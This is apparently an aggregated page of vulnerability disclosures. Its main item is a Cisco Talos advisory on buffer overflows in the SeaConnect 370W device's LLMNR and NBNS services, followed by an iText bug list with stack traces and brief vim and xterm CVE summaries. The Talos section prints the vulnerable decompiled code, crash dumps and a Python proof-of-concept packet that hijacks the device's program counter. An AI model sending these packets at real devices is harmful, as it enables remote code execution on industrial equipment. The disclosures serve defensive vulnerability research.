2022-02-01 - Public Release  

Discovered by Francesco Benvenuto and Matt Wiseman of Cisco Talos.

CVE-2021-21971: TALOS-2021-1406 || Cisco Talos Intelligence Group

A stack-based buffer overflow vulnerability exists in both the LLMNR functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. A specially-crafted network packet can lead to remote code execution. An attacker can send a malicious packet to trigger this vulnerability.

**Summary**

A stack-based buffer overflow vulnerability exists in both the LLMNR and NBNS functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. A specially-crafted network packet can lead to remote code execution. An attacker can send a malicious packet to trigger either of the vulnerabilities.

**Tested Versions**

Sealevel Systems, Inc. SeaConnect 370W v1.3.34

**Product URLs**

SeaConnect 370W - https://www.sealevel.com/product/370w-a-wifi-to-form-c-relays-digital-inputs-a-d-inputs-and-1-wire-bus-seaconnect-multifunction-io-edge-module-powered-by-seacloud/

**CVSSv3 Score**

10.0 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-121 - Stack-based Buffer Overflow

**Details**

The SeaConnect 370W is a Wi-Fi connected IIoT device offering programmable cloud access and control of digital and analog I/O and a 1-wire bus.

This device offers remote control via several means including MQTT, Modbus TCP and a manufacturer-specific protocol named “SeaMAX API.”

The device is built on top of the TI CC3200 MCU with built-in Wi-Fi capabilities.

The SeaConnect 370W exposes three name resolution services: LLMNR, NBNS and mDNS. The LLMNR and NBNS implementations both contain similar stack-based buffer overflows while parsing received queries. Given that LLMNR and NBNS both utilize the DNS header format with only a handful of exceptions, their parsing code is very similar. In this case, it appears to be reused from one to the next.

The vulnerability occurs when attempting to copy the queried name to a local buffer of fixed size (identified above as name_buffer). The implementation does not conduct any bounds checking prior to copying the data, simply trusting the supplied length field will be accurate and no larger than 32 bytes. Supplying a significantly large length value and queried name will result in an overflow of the stack, and ultimately in attacker control of the program counter. The overflow is limited to a maximum of 255 bytes in controllable data, as the length field is limited to a single byte.

**CVE-2021-21960 - LLMNR Buffer Overflow**

The parsing implementation for LLMNR begins at raw offset 0x1106A, which when mapped in to RAM for execution, is located at 0x2001106A.

    int __fastcall GenerateLLMNRResponse(_WORD *a1, _DWORD *a2, __int16 *query)
    {
      __int16 *offset; // r7
      __int16 id; // r10
      __int16 flags; // t1
      __int16 QDCOUNT; // t1
      __int16 ANCOUNT; // t1
      __int16 NSCOUNT; // t1
      __int16 ARCOUNT; // t1
      char *queried_name; // r7
      int name_length; // t1 MAPDST
      char *name_buffer_idx; // r1
      char curr_char; // t1
      ...
      char name_buffer[32]; // [sp+0h] [bp-68h] BYREF      [1] Fixed size, stack-allocated buffer of 32 bytes
      char response[72]; // [sp+20h] [bp-48h] BYREF
    
      offset = query + 1;
      id = htons(*query);
      flags = *offset++;
      htons(flags);
      QDCOUNT = *offset++;
      htons(QDCOUNT);
      ANCOUNT = *offset++;
      htons(ANCOUNT);
      NSCOUNT = *offset++;
      htons(NSCOUNT);
      ARCOUNT = *offset++;
      htons(ARCOUNT);
      
      name_length = *offset;                               [2] Read length octet of the queried name from attacker controlled payload
      queried_name = offset + 1;
      memset(name_buffer, 0, sizeof(name_buffer));
      for (int idx = 0; idx < name_length; idx++)          [3] Copy `name_length` bytes into stack-based variable, with no checks
      {
          name_buffer[idx] = queried_name[idx];
      }
      ...
    }
    

The copy that occurs at [3] results in a straightforward buffer overflow that will corrupt the link register value pushed on to the stack when the function was first entered. When this corrupted value is popped from the stack, the program counter will begin executing from an arbitrary attacker-controlled address.

**Crash Information**

    [Hard fault handler]
    R0       = 0x00000000
    R1       = 0x200014e8
    R2       = 0x20001508
    R3       = 0x00000032
    R12      = 0x20001560
    LR [R14] = 0x20011115  subroutine call return address
    PC [R15] = 0x4d4d4d4c  Program Counter
    PSR      = 0x21000000
    BFAR     = 0xe000ed38
    CFSR     = 0x00000001
    HFSR     = 0x40000000
    DFSR     = 0x00000000
    AFSR     = 0x00000000
    

**Exploit Proof of Concept**

    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(b'\xdf\x76\x01\x20\x00\x01\x00\x00\x00\x00\x00\x00\xff' + b'A'*100 + b'MMMM', ('<target_ip>', 5355))
    

**CVE-2021-21961 - NBNS Buffer Overflow**

The parsing implementation for NetBIOS begins at raw offset 0x10D70, which when mapped in to RAM for execution, is located at 0x20010D70. Note that the parsing implementation is the same.

    int __fastcall GenerateNBNSResponse(_WORD *a1, _DWORD *a2, __int16 *query)
    {
      __int16 *offset; // r7
      __int16 id; // r10
      __int16 flags; // t1
      __int16 QDCOUNT; // t1
      __int16 ANCOUNT; // t1
      __int16 NSCOUNT; // t1
      __int16 ARCOUNT; // t1
      char *queried_name; // r7
      int name_length; // t1 MAPDST
      char *name_buffer_idx; // r1
      char curr_char; // t1
      ...
      char name_buffer[32]; // [sp+0h] [bp-68h] BYREF      [1] Fixed size, stack-allocated buffer of 32 bytes
      char response[72]; // [sp+20h] [bp-48h] BYREF
    
      offset = query + 1;
      id = htons(*query);
      flags = *offset++;
      htons(flags);
      QDCOUNT = *offset++;
      htons(QDCOUNT);
      ANCOUNT = *offset++;
      htons(ANCOUNT);
      NSCOUNT = *offset++;
      htons(NSCOUNT);
      ARCOUNT = *offset++;
      htons(ARCOUNT);
      
      name_length = *offset;                               [2] Read length octet of the queried name
      queried_name = offset + 1;
      memset(name_buffer, 0, sizeof(name_buffer));
      for (int idx = 0; idx < name_length; idx++)          [3] Copy `name_length` bytes into stack-based variable, with no checks
      {
          name_buffer[idx] = queried_name[idx];
      }
      ...
    }
    

The copy that occurs at [3] results in a straightforward buffer overflow that will corrupt the link register value pushed on to the stack when the function was first entered. When this corrupted value is popped from the stack, the program counter will begin executing from an arbitrary attacker-controlled address.

**Crash Information**

    [Hard fault handler]
    R0       = 0x00000000
    R1       = 0x200014e8
    R2       = 0x00000020
    R3       = 0x00000041
    R12      = 0x20001560
    LR [R14] = 0x20010e09  subroutine call return address
    PC [R15] = 0x4d4d4d4c  Program Counter
    PSR      = 0x21000000
    BFAR     = 0xe000ed38
    CFSR     = 0x00000001
    HFSR     = 0x40000000
    DFSR     = 0x00000000
    AFSR     = 0x00000000
    

**Exploit Proof of Concept**

    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(b'\xdf\x76\x01\x20\x00\x01\x00\x00\x00\x00\x00\x00\xff' + b'A'*100 + b'MMMM', ('<target_ip>', 137))
    

**Timeline**

2021-10-26 - Vendor disclosure  
2022-02-01 - Public Release  

Discovered by Francesco Benvenuto and Matt Wiseman of Cisco Talos.

CVE-2021-21960: TALOS-2021-1389 || Cisco Talos Intelligence Group

iText v7.1.17 was discovered to contain a stack-based buffer overflow via the component ByteBuffer.append, which allows attackers to cause a Denial of Service (DoS) via a crafted PDF file.

**Unqiue Bugs Found**

Recently we (\[Zhang Cen\](https://github.com/occia) , \[Huang Wenjie\](https://github.com/ZanderHuang) and \[Zhang Xiaohan\](https://github.com/Han0nly)) discovered a series of bugs in latest itextpdf (version 7.1.17). Every bug we reported in the following is unique and reproducable. Furthermore, they have been manually analyzed and triaged in removing the duplicates.  
Due to the lack of contextual knowledge in the itextpdf library, we cannot thoroughly fix some bugs hence we look forward to any proposed plan from the developers in fixing these bugs.

**Bug Report**

The bug report folder can be downloaded from https://drive.google.com/drive/folders/1b38Mi8fKp05vzMbth1oiopFYNH92GWrK?usp=sharing

Total 56 bugs are reported in this pull request.  
A full list is provided below.

**Folder structure**

*   Level 1 (folder): exception type
*   Level 2 (folder): error location
*   Level 3 (files): POC file and **report.txt** including reproducing steps

**report.txt content:**

1.  Exception type
2.  Error location
3.  Bug cause and impact
4.  Crash thread's stacks
5.  Steps to reproduce

**Bug full list**

1.  java.lang.ArrayIndexOutOfBoundsException  
    \-- com.itextpdf.kernel.crypto.ARCFOUREncryption.encryptARCFOUR--ARCFOUREncryption.java-93  
    \-- com.itextpdf.kernel.crypto.securityhandler.StandardHandlerUsingStandard128.computeOwnerKey--StandardHandlerUsingStandard128.java-81  
    \-- com.itextpdf.kernel.pdf.PdfXrefTable.clear--PdfXrefTable.java-448  
    \-- com.itextpdf.kernel.pdf.PdfXrefTable.get--PdfXrefTable.java-153  
    \-- com.itextpdf.kernel.pdf.PdfXrefTable.initFreeReferencesList--PdfXrefTable.java-185
2.  java.lang.ClassCastException  
    \-- com.itextpdf.kernel.crypto.securityhandler.StandardHandlerUsingStandard40.initKeyAndReadDictionary--StandardHandlerUsingStandard40.java-193  
    \-- com.itextpdf.kernel.pdf.PdfDocument.open--PdfDocument.java-1958  
    \-- com.itextpdf.kernel.pdf.PdfEncryption.readAndSetCryptoModeForStdHandler--PdfEncryption.java-531  
    \-- com.itextpdf.kernel.pdf.PdfEncryption.readAndSetCryptoModeForStdHandler--PdfEncryption.java-534  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-1344
3.  java.lang.NegativeArraySizeException  
    \-- com.itextpdf.kernel.pdf.PdfXrefTable.extendXref--PdfXrefTable.java-598
4.  java.lang.NullPointerException  
    \-- com.itextpdf.kernel.crypto.securityhandler.StandardHandlerUsingStandard40.initKeyAndReadDictionary--StandardHandlerUsingStandard40.java-194  
    \-- com.itextpdf.kernel.crypto.securityhandler.StandardSecurityHandler.getIsoBytes--StandardSecurityHandler.java-94  
    \-- com.itextpdf.kernel.pdf.PdfArray.get--PdfArray.java-374  
    \-- com.itextpdf.kernel.pdf.PdfObjectWrapper.markObjectAsIndirect--PdfObjectWrapper.java-141  
    \-- com.itextpdf.kernel.pdf.PdfReader.getOriginalFileId--PdfReader.java-669  
    \-- com.itextpdf.kernel.pdf.PdfReader.readDecryptObj--PdfReader.java-1287  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-1344  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObjectStream--PdfReader.java-738  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObjectStream--PdfReader.java-739  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObjectStream--PdfReader.java-740  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObjectStream--PdfReader.java-773  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObjectStream--PdfReader.java-792
5.  java.lang.NumberFormatException  
    \-- com.itextpdf.io.source.PdfTokenizer.getIntValue--PdfTokenizer.java-512  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-314  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-315
6.  java.lang.OutOfMemoryError  
    \-- com.itextpdf.kernel.pdf.PdfReader.readStreamBytesRaw--PdfReader.java-391  
    \-- com.itextpdf.kernel.pdf.PdfXrefTable.extendXref--PdfXrefTable.java-598
7.  java.lang.StackOverflowError  
    \-- com.itextpdf.io.source.ByteBuffer.append--ByteBuffer.java-110  
    \-- com.itextpdf.io.source.PdfTokenizer.getStringValue--PdfTokenizer.java-187  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-341  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-343  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-361  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-377  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-413  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-452  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-469  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-271  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-300  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-306  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-314  
    \-- com.itextpdf.io.source.RandomAccessFileOrArray.read--RandomAccessFileOrArray.java-138  
    \-- com.itextpdf.io.util.MessageFormatUtil.format--MessageFormatUtil.java-55  
    \-- com.itextpdf.kernel.pdf.PdfDictionary.putAll--PdfDictionary.java-333  
    \-- com.itextpdf.kernel.pdf.PdfName.compareTo--PdfName.java-1003  
    \-- com.itextpdf.kernel.pdf.PdfNumber.generateValue--PdfNumber.java-180  
    \-- com.itextpdf.kernel.pdf.PdfReader.readArray--PdfReader.java-944  
    \-- com.itextpdf.kernel.pdf.PdfReader.readDictionary--PdfReader.java-923  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-1336  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-1344  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-801  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-845  
    \-- com.itextpdf.kernel.pdf.PdfReader.readPdfName--PdfReader.java-912  
    \-- com.itextpdf.kernel.pdf.PdfReader.readReference--PdfReader.java-817  
    \-- com.itextpdf.kernel.pdf.PdfReader.readReference--PdfReader.java-834
8.  java.lang.StringIndexOutOfBoundsException  
    \-- com.itextpdf.io.source.PdfTokenizer.checkPdfHeader--PdfTokenizer.java-239

Any further discussion for these vulnerabilities including fix is welcomed and look forward to hearing from you.

CVE-2022-24197: A list of bugs found by ZanderHuang · Pull Request #78 · itext/itext7

Heap-based Buffer Overflow GitHub repository vim/vim prior to 8.2.

CVE-2022-0417: Heap-based Buffer Overflow in vim

xterm through Patch 370, when Sixel support is enabled, allows attackers to trigger a buffer overflow in set_sixel in graphics_sixel.c via crafted text.

Tag

#buffer_overflow